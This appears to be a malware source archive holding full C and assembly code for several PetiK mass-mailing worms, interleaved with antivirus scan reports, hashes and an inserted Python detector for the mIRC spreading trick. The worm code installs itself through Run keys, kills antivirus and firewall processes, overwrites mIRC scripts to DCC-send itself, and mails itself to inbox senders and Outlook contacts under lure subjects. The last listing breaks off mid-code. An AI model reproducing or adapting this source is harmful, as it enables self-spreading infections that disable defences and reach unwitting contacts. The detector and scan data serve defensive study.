    if(RegSerPro) RegSerPro(NULL,1);
  }
  /* NB: the path buffers are 50 bytes but 100 is passed as their size (original code) */
  GetModuleFileName(hInst,filename,100);
  GetSystemDirectory((char *)copysys,100);
  strcpy(htmf,copysys);
  strcat(copysys,"\\Flash32.exe");
  strcat(htmf,"\\FlashNet.htm");
  installed=FALSE;
  uninstall=FALSE;
  /* "-i": started from the installed copy; "-u": the fake "Flash32 Uninstall" entry */
  cmdLine=GetCommandLine();
  if(cmdLine)
  {
    for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++);
    if(ptr[0]=='-' && ptr[1]!=0)
    {
      switch(ptr[1])
      {
        default: break;
        case 'i': installed=TRUE; break;
        case 'u': installed=TRUE; uninstall=TRUE; break;
      }
    }
  }
  if(!installed)
  {
    /* First run: copy to %system%, Run key with "-i", Add/Remove Programs entry,
       drop the HTML mailer, then show a fake error and quit */
    CopyFile(filename,copysys,FALSE);
    strcpy(copyreg,copysys);
    strcat(copyreg," -i");
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
    RegSetValueEx(hReg,"Flash32",0,REG_SZ,(BYTE *)copyreg,100);
    RegCloseKey(hReg);
    strcpy(ust,copysys);
    strcat(ust," -u");
    RegCreateKey(HKEY_LOCAL_MACHINE,Uninst,&hReg);
    RegSetValueEx(hReg,"DisplayName",0,REG_SZ,(BYTE *)dn,20);
    RegSetValueEx(hReg,"UninstallString",0,REG_SZ,(BYTE *)ust,40);
    RegCloseKey(hReg);
    htm=fopen(htmf,"w");
    fprintf(htm,"%s",htmms);
    fclose(htm);
    MessageBox(NULL,"Error : cannot open flash32.dll","ERROR",MB_OK|MB_ICONSTOP);
    ExitProcess(0);
  }
  if(uninstall)
  {
    /* Remove the Run value, the uninstall key and the HTMail flag, delete the HTML file,
       schedule deletion of the %system% copy through WININIT.INI and force a reboot */
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_ALL_ACCESS,&hReg);
    RegDeleteValue(hReg,"Flash32");
    RegCloseKey(hReg);
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall",0,KEY_ALL_ACCESS,&hReg);
    RegDeleteKey(hReg,"LiteLo");
    RegCloseKey(hReg);
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft",0,KEY_ALL_ACCESS,&hReg);
    RegDeleteValue(hReg,"HTMail");
    RegCloseKey(hReg);
    DeleteFile(htmf);
    WritePrivateProfileString("rename","NUL",copysys,"WININIT.INI");
    MessageBox(NULL,"Please restart the system.","Uninstall Flash32",MB_OK|MB_ICONHAND);
    ExitWindowsEx(EWX_REBOOT|EWX_FORCE,0);
    ExitProcess(0);
  }
  // Check if we are connected
  WiNet=LoadLibrary("WININET.DLL");
  if(!WiNet)
  {
    goto cworm;
  }
  (FARPROC &)INetConnect=GetProcAddress(WiNet, "InternetGetConnectedState");
  if(!INetConnect)
  {
    FreeLibrary(WiNet);
    goto cworm;
  }
  while(INetConnect(&Tmp,0)!=TRUE)
  {
    Sleep(1000);
  }
  FreeLibrary(WiNet);
  /* Show the HTML mailer until it has recorded HTMail=OK */
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft",0,KEY_QUERY_VALUE,&hReg);
  RegQueryValueEx(hReg,"HTMail",0,&type,htmail,&shtmail);
  RegCloseKey(hReg);
  if(strcmp(htmail,"OK")!=0)
  {
    ShellExecute(NULL,"open",htmf,NULL,NULL,SW_SHOWMAXIMIZED);
  }
cworm:
  /* Simple MAPI: walk the inbox and reply to each message's sender with the worm
     attached under one of the attname[] names */
  hMAPI=LoadLibrary("MAPI32.DLL");
  (FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
  (FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
  (FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
  (FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
  (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
  (FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
  mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
  if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS)
  {
    do
    {
      if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mess)==SUCCESS_SUCCESS)
      {
        strcpy(mname,mess->lpOriginator->lpszName);
        strcpy(maddr,mess->lpOriginator->lpszAddress);
        mess->ulReserved=0;
        mess->lpszSubject="New! New! Version of Flash";
        mess->lpszNoteText="Hi,\nLook at this demo version of Flash.\n\nIt's easy and free.";
        mess->lpszMessageType=NULL;
        mess->lpszDateReceived=NULL;
        mess->lpszConversationID=NULL;
        mess->flFlags=MAPI_SENT;
        /* Swap the envelope: the original sender becomes the To: recipient */
        mess->lpOriginator->ulReserved=0;
        mess->lpOriginator->ulRecipClass=MAPI_ORIG;
        mess->lpOriginator->lpszName=mess->lpRecips->lpszName;
        mess->lpOriginator->lpszAddress=mess->lpRecips->lpszAddress;
        mess->nRecipCount=1;
        mess->lpRecips->ulReserved=0;
        mess->lpRecips->ulRecipClass=MAPI_TO;
        mess->lpRecips->lpszName=mname;
        mess->lpRecips->lpszAddress=maddr;
        mess->nFileCount=1;
        mess->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
        memset(mess->lpFiles, 0, sizeof(MapiFileDesc));
        mess->lpFiles->ulReserved=0;
        mess->lpFiles->flFlags=NULL;
        mess->lpFiles->nPosition=-1;
        mess->lpFiles->lpszPathName=filename;
        mess->lpFiles->lpszFileName=attname[GetTickCount()&6];  /* &6 only ever selects index 0, 2, 4 or 6 */
        mess->lpFiles->lpFileType=NULL;
        mSendMail(session, NULL, mess, NULL, NULL);
      }
    }while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
    free(mess->lpFiles);
    mFreeBuffer(mess);
    mLogoff(session,0,0,0);
    FreeLibrary(hMAPI);
  }
}

File Litelo.exe received on 05.16.2009 17:51:36 (CET)
Scan results (the four columns were flattened in extraction; engine, version and last-update lists are in the same order, while the Result list omits engines that reported nothing and so cannot be mapped back to engines by position):
Antivirus: a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster
Version: 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0
Last Update: 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16
Result: Backdoor.Win32.Hackarmy!IK Win32/Litelo.worm.28672 Worm/Petik.Flash.1 Worm/Win32.Win32 W32/Petik.G Win32:Trojan-gen {Other} I-Worm/Petik Win32.Petik.F@mm I-Worm.Petik Worm.Win32.Petik Win32.Petik.59904 Win32.Petik Win32/Petik.28672.B W32/Petik.G Email-Worm.Win32.Petik W32/Petik!worm Win32.Petik.F@mm Backdoor.Win32.Hackarmy Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick.ab.gen W32/PetTick.ab.gen Worm.Petik.Flash.1 Worm:Win32/Petick@mm Win32/Petik W32/Pet_Tick.28672.A Worm/W32.Petik.28672 Worm Generic.LC I-Worm.Petllo Medium Risk Malware Worm.Litelo W32/Petik-Q Email-Worm.Win32.Petik W95.Pet_Tick.gen Trojan/Hami WORM_PETIK.A Win32.HLLW.Litelo I-Worm.Petllo

Additional information
File size: 28672 bytes
MD5: 4292a1ade77cb9e51e3de52101c99dcb
SHA1: b485fdd64fda5d12221f83be8c062588f051b2c6
PEiD: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

comment #
 Name   : I-Worm.Together
 Author : PetiK
 Date   : March 10th 2002 - March 15th 2002
#

.586p
.model flat
.code
JUMPS

api macro a
  extrn a:proc
  call a
endm

PROCESSENTRY32 STRUCT
  dwSize              DWORD ?
  cntUsage            DWORD ?
  th32ProcessID       DWORD ?
  th32DefaultHeapID   DWORD ?
  th32ModuleID        DWORD ?
  cntThreads          DWORD ?
  th32ParentProcessID DWORD ?
  pcPriClassBase      DWORD ?
  dwFlags             DWORD ?
  szExeFile           db 260 dup(?)
PROCESSENTRY32 ENDS

include Useful.inc

start_worm:
  call hide_worm                        ; hide from the Win9x task list (see hide_worm)

twin_worm:
  push 50
  mov esi,offset orig_worm
  push esi
  push 0
  api GetModuleFileNameA                ; esi = name of file

  push 50
  push offset verif_worm
  api GetSystemDirectoryA
  @pushsz "\EBASE64.EXE"
  push offset verif_worm
  api lstrcat

  mov edi,offset copy_worm
  push edi
  push 50
  push edi
  api GetSystemDirectoryA
  add edi,eax
  mov eax,"aBe\"
  stosd
  mov eax,"46es"
  stosd
  mov eax,"exe."
  stosd                                 ; edi = %system%\eBase64.exe
  pop edi

  push offset orig_worm
  push offset verif_worm
  api lstrcmp                           ; already running from %system%?
  test eax,eax
  jz continue_worm

  push 0
  push edi
  push esi
  api CopyFileA                         ; copy file

  push 20
  push edi
  push 1
  @pushsz "Encode Base64"
  @pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
  push 80000002h
  api SHSetValueA                       ; regedit: HKLM Run entry for the %system% copy
  jmp end_worm

; Enumerate processes and terminate anything whose image name matches a known
; anti-virus or firewall; the killed image is then copied under a new name and deleted
continue_worm:
fuck_antivirus:
  @pushsz "OIFIL400.DLL"
  api LoadLibraryA
  test eax,eax
  jz end_fuck_antivirus
  push 0
  push 2
  api CreateToolhelp32Snapshot
  mov lSnapshot, eax
  inc eax                               ; INVALID_HANDLE_VALUE (-1) becomes 0
  jz end_fuck_antivirus
  lea eax,uProcess
  mov [eax.dwSize], SIZE PROCESSENTRY32
  lea eax,uProcess
  push eax
  push lSnapshot
  api Process32First
checkfile:
  test eax, eax
  jz InfExpRetCl
  push ecx
  mov eax,ProcessID
  push offset uProcess
  cmp eax,[uProcess.th32ProcessID]
  je NextFile
  lea ebx,[uProcess.szExeFile]

; verif: search the current image name (ebx) for verifname; ZF clear means found
verif macro verifname,empty
  local name
  ifnb <empty>
    %out too much arguments in macro 'nxt_instr'
    .err
  endif
  call name
  db verifname,0
name:
  push ebx
  api lstrstr
  test eax,eax
endm

  verif "ARG"
  jnz term
  verif "AVP32.EXE"                     ; AVP
  jnz term
  verif "AVPCC.EXE"                     ; AVP
  jnz term
  verif "AVPM.EXE"                      ; AVP
  jnz term
  verif "WFINDV32.EXE"                  ; McAfee
  jnz term
  verif "F-AGNT95.EXE"                  ; F-SECURE
  jnz term
  verif "NAVAPW32.EXE"                  ; Norton
  jnz term
  verif "NAVW32.EXE"                    ; Norton
  jnz term
  verif "NMAIN.EXE"                     ; Norton
  jnz term
  verif "PAVSHED.EXE"                   ; PandaSoftware
  jnz term
  verif "vshwin32.exe"                  ; McAfee
  jnz term
  verif "PETIKSHOW.EXE"
  jnz term
  @pushsz "ZONEALARM.EXE"
  push ebx
  api lstrstr
  test eax,eax
  jz NextFile
term:
  push [uProcess.th32ProcessID]
  push 1
  push 001F0FFFh                        ; PROCESS_ALL_ACCESS
  api OpenProcess
  test eax,eax
  jz NextFile
  push 0
  push eax
  api TerminateProcess
  push ebx
  push offset new_name
  api lstrcpy
  mov esi,offset new_name
  push esi
  api lstrlen
  add esi,eax
  sub esi,4
  mov [esi],"ktp."                      ; overwrite the extension: ".ptk" ...
  lodsd
  mov [esi],"kmz."                      ; ... followed by ".zmk"
  lodsd
  push 0
  push offset new_name
  push ebx
  api CopyFileA
  push ebx
  api DeleteFileA
NextFile:
  push offset uProcess
  push lSnapshot
  api Process32Next
  jmp checkfile

InfExpRetCl:
  push lSnapshot
  api CloseHandle
end_fuck_antivirus:
  call Spread_Mirc
  call Spread_Worm
e_s_w:
end_worm:
  push 0
  api ExitProcess

hide_worm Proc
  pushad
  @pushsz "KERNEL32.DLL"
  api GetModuleHandleA
  xchg eax,ecx
  jecxz end_hide_worm
  @pushsz "RegisterServiceProcess"
  push ecx
  api GetProcAddress
  xchg eax,ecx
  jecxz end_hide_worm
  push 1
  push 0
  call ecx                              ; Registered as Service Process
end_hide_worm:
  popad
  ret
hide_worm EndP

; spread with mIRC. Thanx to Microsoft.
; Overwrite script.ini at four candidate mIRC paths with a JOIN handler that DCC-sends
; the %system% copy to every nick that joins a channel
Spread_Mirc Proc
  push offset copy_worm
  push offset mirc_exe
  api lstrcpy
  call @mirc
  db "C:\mirc\script.ini",0
  db "C:\mirc32\script.ini",0
  db "C:\progra~1\mirc\script.ini",0
  db "C:\progra~1\mirc32\script.ini",0
@mirc:
  pop esi
  push 4
  pop ecx
mirc_loop:
  push ecx
  push 0
  push 80h
  push 2
  push 0
  push 1
  push 40000000h
  push esi
  api CreateFileA
  mov ebp,eax
  push 0
  push offset byte_write
@tmp_mirc:
  push e_mirc - s_mirc
  push offset s_mirc
  push ebp
  api WriteFile
  push ebp
  api CloseHandle
  @endsz
  pop ecx
  loop mirc_loop
end_spread_mirc:
  ret
Spread_Mirc EndP

; Drop and run %system%\eBase.vbs (dumps the Outlook address book to %system%\together.ini),
; wait for a connection, then mail the worm to every address in that file through Simple MAPI
Spread_Worm Proc
  pushad
  push 50
  push offset vbs_worm
  api GetSystemDirectoryA
  @pushsz "\eBase.vbs"
  push offset vbs_worm
  api lstrcat
  push 0
  push 20h
  push 2
  push 0
  push 1
  push 40000000h
  push offset vbs_worm
  api CreateFileA
  mov ebp,eax
  push 0
  push offset byte_write
  push e_vbs - s_vbs
  push offset s_vbs
  push ebp
  api WriteFile
  push ebp
  api CloseHandle

  push 1
  push 0
  push 0
  push offset vbs_worm
  @pushsz "open"
  push 0
  api ShellExecuteA
verif_inet:
  push 0
  push offset inet
  api InternetGetConnectedState
  dec eax
  jnz verif_inet                        ; busy-wait until online

  push 50
  push offset t_ini
  api GetSystemDirectoryA
  @pushsz "\together.ini"
  push offset t_ini
  api lstrcat
  push 00h
  push 80h
  push 03h
  push 00h
  push 01h
  push 80000000h
  push offset t_ini
  api CreateFileA
  inc eax
  je end_spread_worm
  dec eax
  xchg eax,ebx                          ; ebx = file handle
  xor eax,eax
  push eax
  push eax
  push eax
  push 2
  push eax
  push ebx
  api CreateFileMappingA
  test eax,eax
  je end_s1
  xchg eax,ebp                          ; ebp = mapping handle
  xor eax,eax
  push eax
  push eax
  push eax
  push 4
  push ebp
  api MapViewOfFile
  test eax,eax
  je end_s2
  xchg eax,esi                          ; esi = mapped together.ini
  push 0
  push ebx
  api GetFileSize
  cmp eax,4
  jbe end_s3

; together.ini is ";"-separated addresses terminated by "#"; spaces are dropped and
; edx counts "@" characters so entries without one are skipped
scan_mail:
  xor edx,edx
  mov edi,offset mail_addr
  push edi
p_c:
  lodsb
  cmp al," "
  je car_s
  cmp al,";"
  je end_m
  cmp al,"#"
  je f_mail
  cmp al,'@'
  jne not_a
  inc edx
not_a:
  stosb
  jmp p_c
car_s:
  inc esi
  jmp p_c
end_m:
  xor al,al
  stosb
  pop edi
  test edx,edx
  je scan_mail
  call send_mail
  jmp scan_mail

f_mail:
end_s3:
  push esi
  api UnmapViewOfFile
end_s2:
  push ebp
  api CloseHandle
end_s1:
  push ebx
  api CloseHandle
end_spread_worm:
  popad
  jmp e_s_w
Spread_Worm EndP

send_mail:
  xor eax,eax
  push eax
  push eax
  push offset Message
  push eax
  push [sess]
  api MAPISendMail
  ret

.data
; === Copy Worm ===
orig_worm   db 50 dup (0)
copy_worm   db 50 dup (0)
verif_worm  db 50 dup (0)
sysTime     db 16 dup(0)

; === Fuck AntiVirus ===
uProcess    PROCESSENTRY32 <?>
ProcessID   dd ?
lSnapshot   dd ?
new_name    db 100 dup (?)

; === Spread With mIrc ===
; The whole s_mirc..e_mirc block is written, so the file carries the full 50-byte
; mirc_exe buffer (path, NUL, padding) before the CRLF and "n3=}"
s_mirc:
  db "[script]",CRLF
  db ";Don't edit this file.",CRLF,CRLF
  db "n0=on 1:JOIN:{",CRLF
  db "n1= /if ( $nick == $me ) { halt }",CRLF
  db "n2= /.dcc send $nick "
mirc_exe    db 50 dup (?)
  db CRLF,"n3=}",0
e_mirc:
byte_write  dd ?

; === Spread with Outlook ===
vbs_worm    db 50 dup (0)
t_ini       db 50 dup (0)
mail_addr   db 128 dup (?)
inet        dd 0
sess        dd 0
subject     db "Re: Answer",0
body        db "Here for you...",0
filename    db "funny_game.exe",0

Message     dd ?                        ; MapiMessage.ulReserved
            dd offset subject           ; lpszSubject
            dd offset body              ; lpszNoteText
            dd ?                        ; lpszMessageType
            dd ?                        ; lpszDateReceived
            dd ?                        ; lpszConversationID
            dd 2                        ; flFlags
            dd offset MsgFrom           ; lpOriginator
            dd 1                        ; nRecipCount
            dd offset MsgTo             ; lpRecips
            dd 1                        ; nFileCount
            dd offset Attach            ; lpFiles

MsgFrom     dd ?                        ; MapiRecipDesc for the originator, left empty
            dd ?
            dd ?
            dd ?
            dd ?
            dd ?

MsgTo       dd ?                        ; MapiRecipDesc.ulReserved
            dd 1                        ; ulRecipClass = MAPI_TO
            dd offset mail_addr         ; lpszName
            dd offset mail_addr         ; lpszAddress
            dd ?                        ; ulEIDSize
            dd ?                        ; lpEntryID

Attach      dd ?                        ; MapiFileDesc.ulReserved
            dd ?                        ; flFlags
            dd ?                        ; nPosition
            dd offset orig_worm         ; lpszPathName: the running copy
            dd offset filename          ; lpszFileName shown to the recipient
            dd ?                        ; lpFileType

s_vbs:
  db 'On Error Resume Next',CRLF
  db 'Set fs=CreateObject("Scripting.FileSystemObject")',CRLF
  db 'Set sys=fs.GetSpecialFolder(1)',CRLF
  db 'Set c=fs.CreateTextFile(sys&"\together.ini")',CRLF
  db 'c.Close',CRLF
  db 'Set ou=CreateObject("Outlook.Application")',CRLF
  db 'Set map=ou.GetNameSpace("MAPI")',CRLF
  db 'adr=""',CRLF
  db 'For Each mel in map.AddressLists',CRLF
  db 'If mel.AddressEntries.Count <> 0 Then',CRLF
  db 'For O=1 To mel.AddressEntries.Count',CRLF
  db 'adr=adr &";"& mel.AddressEntries(O).Address',CRLF
  db 'Next',CRLF
  db 'End If',CRLF
  db 'Next',CRLF
  db 'adr=adr &";#"',CRLF,CRLF
  db 'Set c=fs.OpenTextFile(sys&"\together.ini",2)',CRLF
  db 'c.WriteLine adr',CRLF
  db 'c.Close',CRLF
e_vbs:

signature   db "I-Worm.Together "
author      db "Coded by PetiK - 2002",00h

end start_worm
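Spread_Mirc writes the s_mirc block over script.ini at four candidate mIRC paths; the handler it installs fires on every JOIN and DCC-sends the %system% copy to the joining nick. The Python below is an added example, not the worm's code: it parses a mIRC script.ini into its numbered script lines and reports any JOIN handler that issues a DCC send to $nick, which is what a responder would grep for on a machine that had mIRC installed. The two .ini texts are constructed; the worm-shaped one includes NUL padding after the path because the worm writes the whole 50-byte mirc_exe buffer, and the parser cuts each line at the first NUL for that reason. The handler matcher is written for the general case (any level, one-line or braced handlers), not only the exact four lines the worm drops.

```python
"""Flag mIRC script.ini handlers that DCC-send a file to everyone who joins a channel,
the propagation trick I-Worm.Together installs in Spread_Mirc (s_mirc in the .data section).

Added example, not part of the archive. The sample inis below are constructed.
"""
import re
from typing import Dict, List, Tuple

JOIN_HANDLER = re.compile(r"^\s*on\s+\S+:join:", re.IGNORECASE)
DCC_SEND = re.compile(r"/\.?dcc\s+send\s+\$nick\s+(\S+)", re.IGNORECASE)


def parse_mirc_ini(text: str) -> Dict[str, List[str]]:
    """Return {section: [script lines in n0, n1, ... order]} for a mIRC script.ini."""
    sections: Dict[str, List[Tuple[int, str]]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.split("\x00", 1)[0]      # drop NUL padding (fixed-size buffer written whole)
        stripped = line.strip()
        if not stripped or stripped.startswith(";"):
            continue
        if stripped.startswith("[") and stripped.endswith("]"):
            current = stripped[1:-1].lower()
            sections.setdefault(current, [])
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        m = re.fullmatch(r"n(\d+)", key.strip().lower())
        if m:
            sections[current].append((int(m.group(1)), value))
    return {name: [v for _, v in sorted(entries)] for name, entries in sections.items()}


def find_join_dcc_sends(text: str) -> List[Tuple[str, str, str]]:
    """Return (section, script line, sent path) for each DCC send issued from an on JOIN handler."""
    findings = []
    for section, lines in parse_mirc_ini(text).items():
        in_join = False
        depth = 0
        for ln in lines:
            if JOIN_HANDLER.match(ln):
                in_join = True
                depth = 0
                if "{" not in ln:               # one-line handler: only this line belongs to it
                    m = DCC_SEND.search(ln)
                    if m:
                        findings.append((section, ln.strip(), m.group(1)))
                    in_join = False
                    continue
            if in_join:
                m = DCC_SEND.search(ln)
                if m:
                    findings.append((section, ln.strip(), m.group(1)))
                depth += ln.count("{") - ln.count("}")
                if depth <= 0:                  # closing brace of the handler block
                    in_join = False
    return findings


# Constructed samples: the file the worm writes (with the NUL padding it leaves after the
# path) and a harmless greeting handler that must not be reported.
WORM_INI = (
    "[script]\r\n;Don't edit this file.\r\n\r\n"
    "n0=on 1:JOIN:{\r\n"
    "n1= /if ( $nick == $me ) { halt }\r\n"
    "n2= /.dcc send $nick C:\\WINDOWS\\SYSTEM\\eBase64.exe" + "\x00" * 17 + "\r\n"
    "n3=}\r\n"
)
BENIGN_INI = "[script]\r\nn0=on 1:JOIN:#:{ /msg $nick welcome to $chan }\r\n"

if __name__ == "__main__":
    for section, line, path in find_join_dcc_sends(WORM_INI):
        print("[%s] %s  -> sends %s" % (section, line, path))
```

Point the function at each of the four script.ini paths listed in Spread_Mirc (and at any other remote script the client loads) to cover the whole install.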

File Together.exe received on 05.16.2009 19:41:01 (CET)
Scan results (the four columns were flattened in extraction; engine, version and last-update lists are in the same order, while the Result list omits engines that reported nothing and so cannot be mapped back to engines by position):
Antivirus: a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster
Version: 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0
Last Update: 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16
Result: Email-Worm.Win32.Petik!IK Win32/PetTick.worm.5120 Worm/Petik.FunGame Worm/Win32.Win32 W32/Malware!e382 Win32:PetikTogether I-Worm/Petik Generic.Malware.SIMPPkg.5A573F5C I-Worm.Petik Worm.Petik-2 Worm.Win32.Petik Win32.Petik.8192 Win32.Pet_Tick.AC Win32/Petik.5120.B W32/Malware!e382 Email-Worm.Win32.Petik W32/Petik.M@mm Generic.Malware.SIMPPkg.5A573F5C Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM Artemis!91703278352E Worm.Petik.FunGame Worm:Win32/Petick@mm Win32/Petik W32/Petik.D@mm Worm Generic I-Worm.Pettog.A Medium Risk Malware Worm.Together W32/Petik-R W32.Pet_Tick.AC@mm W32.Pet_Tick.AC@mm WORM_PETIK.M Win32.Worm.Together I-Worm.Pettog.A

Additional information
File size: 5120 bytes
MD5: 91703278352e9e18d01d081c73330ec2
SHA1: 81366149cda1578b5dc71b4c4860f9555467e1a4
PEiD: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

/*
   Start    : April 1st 2002
   Name     : I-Worm.SelfWorm
   Coder    : PetiK
   Language : C
*/
#include <windows.h>
#include <stdio.h>
#include <mapi.h>
#include <tlhelp32.h>
#include <winver.h>
#include "SelfWorm.h"

#if defined (win32)
#define IS_WIN32 TRUE
#else
#define IS_WIN32 FALSE
#endif

HINSTANCE hInst; // Current instance.

LPCTSTR lpszAppName = "SelfWorm";
LPCTSTR lpszTitle = "SelfWorm 1.0";
char filename[100],cpywrm[100],copy2[100],start[100];
LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
      SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
LPTSTR cmdLine,ptr;
BOOL installed,rProcessFound;
HANDLE fd,lSnapshot,myproc;
BYTE desktop[50],favoris[50],personal[50],cache[50],startup[100];
DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
      sizpersonal=sizeof(personal),sizdesktop=sizeof(cache),sizstartup=sizeof(startup);
DWORD type=REG_SZ;
FILE *vbsworm;
LHANDLE session;
MapiMessage mess;
MapiMessage *mes;
MapiRecipDesc from;
char messId[512],mname[50],maddr[30];
HINSTANCE hMAPI;
HKEY hReg;
PROCESSENTRY32 uProcess;

void mirc(char *);
void StopAV(char *);
ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);

BOOL RegisterWin95(CONST WNDCLASS* lpwc); int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { MSG msg; HWND hWnd; WNDCLASS wc; RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg); RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop); RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris); RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal); RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache); RegQueryValueEx(hReg,"Startup",0,&type,startup,&sizstartup); RegCloseKey(hReg); GetModuleFileName(hInstance,filename,100);

GetSystemDirectory((char *)cpywrm,100); strcat(cpywrm,"\\ShellW32.exe"); CopyFile(filename,cpywrm,0); strcpy(copy2,cpywrm); strcat(copy2," -i"); RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg); RegSetValueEx(hReg,"Shell32",0,REG_SZ,(BYTE *)copy2,100); RegCloseKey(hReg); installed=FALSE; cmdLine=GetCommandLine(); if(cmdLine) { for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++); if(ptr[0]=='-' && ptr[1]!=0) { switch(ptr[1]) { default: break; case 'i': installed=TRUE; break; } } } hMAPI=LoadLibrary("MAPI32.DLL"); (FARPROC &)mSendMail=GetProcAddress(hMAPI,"MAPISendMail"); (FARPROC &)mLogon=GetProcAddress(hMAPI,"MAPILogon"); (FARPROC &)mLogoff=GetProcAddress(hMAPI,"MAPILogoff"); (FARPROC &)mFindNext=GetProcAddress(hMAPI,"MAPIFindNext"); (FARPROC &)mReadMail=GetProcAddress(hMAPI,"MAPIReadMail"); (FARPROC &)mFreeBuffer=GetProcAddress(hMAPI,"MAPIFreeBuffer"); if(!installed) {

wc.style         = CS_HREDRAW | CS_VREDRAW;
wc.lpfnWndProc   = (WNDPROC)WndProc;
